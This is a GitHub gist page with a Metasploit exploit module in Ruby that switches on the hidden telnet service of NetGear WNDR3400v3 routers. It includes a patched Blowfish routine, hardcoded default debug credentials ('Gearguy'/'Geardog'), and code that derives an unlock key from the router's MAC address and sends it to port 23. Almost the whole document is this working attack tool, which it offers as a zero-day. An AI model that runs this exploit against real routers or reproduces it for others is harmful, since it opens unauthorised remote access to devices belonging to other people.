Skip to content

Instantly share code, notes, and snippets.

@carnal0wnage
Forked from phikshun/netgear_telnet_enabler.rb
Last active August 29, 2015 14:06
Show Gist options
  • Save carnal0wnage/d04be01a76f29c7c7545 to your computer and use it in GitHub Desktop.
Save carnal0wnage/d04be01a76f29c7c7545 to your computer and use it in GitHub Desktop.
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
class Blowfish
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0
0.upto(17) { |i|
data = 0
4.times {
data = ((data << 8) | @key[keypos].ord) % ULONG # minor bug fix to the 1.1.4 version (add .ord for 1.9 compat)
keypos = (keypos.next) % @key.length
}
@pArray[i] = (@pArray[i] ^ data) % ULONG
}
l = 0
r = 0
0.step(17, 2) { |i|
l, r = encrypt_pair(l, r)
@pArray[i] = l
@pArray[i+1] = r
}
0.upto(3) { |i|
0.step(255, 2) { |j|
l, r = encrypt_pair(l, r)
@sBoxes[i][j] = l
@sBoxes[i][j+1] = r
}
}
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'NetGear Telnet Enabler',
'Description' => %q{
This module enables the telnet service on NetGear routers. Successfully tested on
a NetGear WNDR34000v3.
},
'Author' => [ 'phikshun' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[
[ 'NA', 'NA' ],
],
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
[ 'Netgear WNDR3400v3', { }, ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '0 day, yo'))
register_options(
[
Opt::RPORT(23),
OptString.new('MAC', [ true, "The MAC Address of the router LAN interface", nil ]),
OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
], self.class)
end
def generate_key(mac, username, password = '')
mac = mac.split(/[\.\-:]/).map { |b| "%02x" % b.to_i(16) }.join('') if mac =~ /[\.\-:]/
mac.upcase!
just_mac = mac.ljust(0x10, "\x00")
just_username = username.ljust(0x10, "\x00")
just_password = password.ljust(0x10, "\x00")
cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = OpenSSL::Digest::MD5.digest(cleartext)
payload = (md5_key + cleartext).ljust(0x80, "\x00").unpack('V*').pack('N*')
blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)
ciphertext = payload.scan(/.{8}/).map { |b| blowfish.encrypt_block(b) }.join('')
ciphertext.unpack('V*').pack('N*')
end
def exploit
connect
sock.put(generate_key(datastore['MAC'], datastore['USER'], datastore['PASS']))
disconnect
print_status("Unlock key sent -- try telneting to #{rhost}")
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment